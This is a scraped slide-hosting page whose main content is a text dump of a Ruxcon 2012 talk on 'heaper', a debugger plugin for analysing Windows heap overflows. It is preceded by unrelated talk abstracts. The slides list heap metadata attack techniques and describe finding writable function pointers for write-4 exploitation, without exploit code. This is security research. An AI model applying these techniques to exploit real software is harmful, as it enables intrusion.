Pakdata Cf is a groundbreaking system designed to streamline and facilitate access to CNIC information. This innovative platform leverages advanced technology to provide users with efficient and secure access to their CNIC details.
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Speck&Tech
ABSTRACT: A prima vista, un mattoncino Lego e la backdoor XZ potrebbero avere in comune il fatto di essere entrambi blocchi di costruzione, o dipendenze di progetti creativi e software. La realtà è che un mattoncino Lego e il caso della backdoor XZ hanno molto di più di tutto ciò in comune.
Partecipate alla presentazione per immergervi in una storia di interoperabilità, standard e formati aperti, per poi discutere del ruolo importante che i contributori hanno in una comunità open source sostenibile.
BIO: Sostenitrice del software libero e dei formati standard e aperti. È stata un membro attivo dei progetti Fedora e openSUSE e ha co-fondato l'Associazione LibreItalia dove è stata coinvolta in diversi eventi, migrazioni e formazione relativi a LibreOffice. In precedenza ha lavorato a migrazioni e corsi di formazione su LibreOffice per diverse amministrazioni pubbliche e privati. Da gennaio 2020 lavora in SUSE come Software Release Engineer per Uyuni e SUSE Manager e quando non segue la sua passione per i computer e per Geeko coltiva la sua curiosità per l'astronomia (da cui deriva il suo nickname deneb_alpha).
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
How to-catch-a-chameleon-steven seeley-ruxcon-2012
1. How to catch a
chameleon
Steven Seeley
steven@immunityinc.com
@net__ninja
Steven Seeley – Ruxcon 2012
2. C:> whoami /all?
●
mr_me
●
Security Researcher @ Immunity Inc
●
A member of Corelan Security Team
●
ruby python developer
●
reverse engineering
●
exploit developer
Steven Seeley – Ruxcon 2012
3. Disclaimer(s)
No zerodays were hurt during the
making of this presentation
Sorry but some windows heap
knowledge is assumed
Steven Seeley – Ruxcon 2012
4. Agenda
●
What is 'heaper' ?
●
Development motivators
●
Meta data attack techniques
●
Functional design
●
Installation
●
Using heaper
●
Demo analysing a heap overflow
●
Limitations
●
Future work
●
Conclusion
Steven Seeley – Ruxcon 2012
6. Definition of a chameleon?
Chameleon (n)
A small slow-moving Old World lizard
with a prehensile tail, long extensible
tongue, protruding eyes that rotate
independently, and a highly developed
ability to change color
Steven Seeley – Ruxcon 2012
7. Definition of a chameleon?
Chameleon (n)
A small slow-moving Old World lizard
with a prehensile tail, long extensible
tongue, protruding eyes that rotate
independently, and a highly developed
ability to change color
Steven Seeley – Ruxcon 2012
9. Similarities
Chameleon Heap manager analysis
Slow moving Slow evolution of security in heap managers*
Protruding, rotating eyes Symptoms of long debugging sessions
Ability to change color Ability to change its state rapidly
rapidly
Kills and eats bugs Difficultly leads to disclosure, in hope of
other researchers demonstrating exploitation
* Some, such as implementations on mobile platforms, example: WebKit
Steven Seeley – Ruxcon 2012
10. What is heaper?
●
A multi platform win32 heap analysis tool
●
A plug-in for Immunity Debugger
●
Developed in python using immlib/heaplib
●
An offensive focused tool:
●
Visualize the heap layout
●
Determine exploitable conditions using meta-data
●
Find application specific heap primitives
●
Find application specific function pointers
●
Modify heap structures on the fly for simulation
Steven Seeley – Ruxcon 2012
12. Meta data attack techniques
Technique Platform Difficulty* Reliability* Supported
Coalesce unlink() NT 5.[0/1] 10% 100% Yes
VirtualAlloc block unlink() NT 5.[0/1] Unknown Unknown No
Lookaside head overwrite NT 5.2 50-60% Unknown Yes
Freelist insert/search/relink NT 5.2 Unknown Unknown Yes
Bitmap flip NT 5.2 50-60% Unknown Yes
Heap cache desycronisation NT 5.2 90% Unknown No
Critical section unlink() NT 5.2 50% 70% No
FreeEntryOverwrite NT 6.[0/1] 50% 60% Yes
Segment Offset NT 6.[0/1] 50% 80% Yes
Depth De-sync NT 6.[0/1] 50% 70% Yes
UserBlocks Overwrite NT 6.2 90% 40% No
Application data ANY Unknown Unknown Yes
difficulty/reliability* - estimated based specific testing, will vary largely depending on context
Steven Seeley – Ruxcon 2012
13. Functional design
●
Object oriented design
●
Easily extend-able
●
Chunk validation based
on allocator ordering &
categorization
●
General heuristics
check per allocator
Steven Seeley – Ruxcon 2012
15. Functional design
chunk validation:
●
Lets say we have chunk 0x0026fee8 in FreeList[0].
●
We know relative offsets:
●
0x0026fee8+0x0 is the size
●
0x0026fee8+0x2 is the previous chunks size
●
0x0026fee8+0x4 is the cookie
●
0x0026fee8+0x8 is the Flink/Blink
Therefore, we can validate the chunk based on its
positioning and by reading memory
Steven Seeley – Ruxcon 2012
16. Functional design
Chunk validation on ListHint[{0x7f,0x7ff}]
-> Windows 7 LFH (size is encoded)
-> Checks ListHint[0x7f] and ListHint[0x7ff]
Steven Seeley – Ruxcon 2012
17. Functional design
Chunk validation on ListHint[{0x7f,0x7ff}]
-> Windows 7 LFH (size is encoded)
-> Checks ListHint[0x7f] and ListHint[0x7ff]
Steven Seeley – Ruxcon 2012
18. Functional design
Chunk validation on ListHint[{0x7f,0x7ff}]
-> Windows 7 LFH (size is encoded)
-> Checks ListHint[0x7f] and ListHint[0x7ff]
Steven Seeley – Ruxcon 2012
19. Functional design
Chunk validation on ListHint[{0x7f,0x7ff}]
-> Windows 7 LFH (size is encoded)
-> Checks ListHint[0x7f] and ListHint[0x7ff]
Steven Seeley – Ruxcon 2012
20. Functional design
Chunk validation on ListHint[{0x7f,0x7ff}]
-> Windows 7 LFH (size is encoded)
-> Checks ListHint[0x7f] and ListHint[0x7ff]
Steven Seeley – Ruxcon 2012
31. Functional design
Easy to use:
●
Generates a specific menu basic on windows version in use – no
option to analyse the LFH if it doesn't exist
●
Generates graphs for each bin size separately, generally for
exploitation, we target a specific bin size
●
n-4 byte write simulation on function pointers with the ability to
restore the said function pointers
●
The ability to modify a single BIT in the FreeListInUse struct
●
'update' command for easily updating heaper.
●
'config' command to configure the output directory of logs and
graphs
●
Everything is logged in a new “heaper” window
Steven Seeley – Ruxcon 2012
32. Installation
●
Prerequisites:
●
Immunity Debugger v1.85 and above
●
Graphviz v2.28.0 and above -http://www.graphviz.org/
●
Pyparsing - http://sourceforge.net/projects/pyparsing/
●
PyDot - http://code.google.com/p/pydot/
1. Install Immunity Debugger :->
2. Add 'c:python27' to your path environment
3. Run the Graphviz MSI packaged installer
4. Navigate into your pydot and pyparsing directories and execute 'python
setup install'
4. Copy heaper to the 'C:Program FilesImmunity IncImmunity
DebuggerPyCommands' directory
Steven Seeley – Ruxcon 2012
41. Dumping function pointers
●
Finds function pointers despite if they are writable or not
●
Depreciated and will be removed in the next major release
Steven Seeley – Ruxcon 2012
43. Finding writable pointers
● Similar to the dump function pointers routine but
executes the action across the whole module
● This can be executed against all modules
● As the name states, only writable function pointers
to facilitate a write 4 condition
● Don't be fooled, it doesn't just dump the IAT
● It can find OS specific function pointers making
your exploit work despite the existence of
application specific function pointers.
Steven Seeley – Ruxcon 2012
46. Analyzing the allocator state NT 5.x
Lookaside - chunk analysis
● Easy to understand layout
● Displays the cookie, chunk size, flink
● Notification of an overwrite using the first
byte in the chunk header (size)
● If userdata == flink, possible exploitation
Steven Seeley – Ruxcon 2012
47. Analyzing the allocator state NT 5.x
Lookaside with verbose mode (-v)
Steven Seeley – Ruxcon 2012
48. Analyzing the allocator state NT 5.x
Lookaside with verbose mode (-v)
● Displays the _general_lookaside_list struct
● Displays the _slist_header struct
● Instantly determine if a list itself has been
overwritten
● Much like 'dt _general_lookaside_list
<addr>' in windbg
Steven Seeley – Ruxcon 2012
50. Analyzing the allocator state NT 5.x
Lookaside - vuln analysis
●
●
Set a (Function pointer-0x8) to equal the new Lookaside chunk address
Steven Seeley – Ruxcon 2012
73. Hooking the heap manager
Hard hooking
●
HeapAlloc/HeapFree
●
Can be extended
for other heap functions
●
Discover primitives
Steven Seeley – Ruxcon 2012
74. Hooking the heap manager
Soft hooking
Use only for testing, not designed to be used with large applications
Steven Seeley – Ruxcon 2012
75. Patching
Patching - PEB
●
A binary may be compiled in debug mode
●
What if we are trying to execute a function pointer that assumes the
process is not being debugged ?
Steven Seeley – Ruxcon 2012
76. Updating
Update to the latest version with ease
The update function just generates a git hash and compares digests. There
is no version tracking yet.
Steven Seeley – Ruxcon 2012
79. Detecting exploitable conditions
●
Detecting exploitable conditions can be very
difficult and prone to many false positives.
●
If you overwrite a specific chunk, then just due
to the amount of data you overwrote with, it
may/may not be deemed exploitable
●
Therefore understanding the limitations of
each of the conditions is required for accurate
analysis.
Steven Seeley – Ruxcon 2012
82. Detecting exploitable conditions
FreeList/ListHint – No technique suggestion*
● No techniques for exploitation against the FreeList/ListHint under windows
NT 6.x have been disclosed publicly so far.
Steven Seeley – Ruxcon 2012
88. Limitations
●
Does not analyze LFH on XP
●
Does not analyze LFH on Windows 8
●
Supports only a limited number of meta-data
attacks for now
●
Does not log analysis findings external to the
debugger
●
Needs a decent heap search function
●
Need to support other heap implementations
Steven Seeley – Ruxcon 2012
89. Future work
●
Support LFH analysis on Windows 8
●
Support other heap manager implementations
(jemalloc)
●
Support more meta-data attacks
●
Perform log analysis
●
Detect 'interesting' application data on the
heap
●
Add a decent search function
●
Improve the heuristics engine
Steven Seeley – Ruxcon 2012
90. Conclusion
●
Run-time analysis of the heap to detect meta-
data attack conditions is complex
●
Some form of solver maybe more applicable to
this type of analysis :->
●
Whilst heaper is not turing complete, it will
solve many corner cases.
●
Immunity will continue to be a leader in the
development and application of heap
exploitation techniques
Steven Seeley – Ruxcon 2012
92. Code design/improvements/patches/ideas
are very welcome :>
steventhomasseeley@gmail.com
For more information please execute:
$ git clone https://github.com/mrmee/heaper.git
$ wget -r http://net-ninja.net/
Steven Seeley – Ruxcon 2012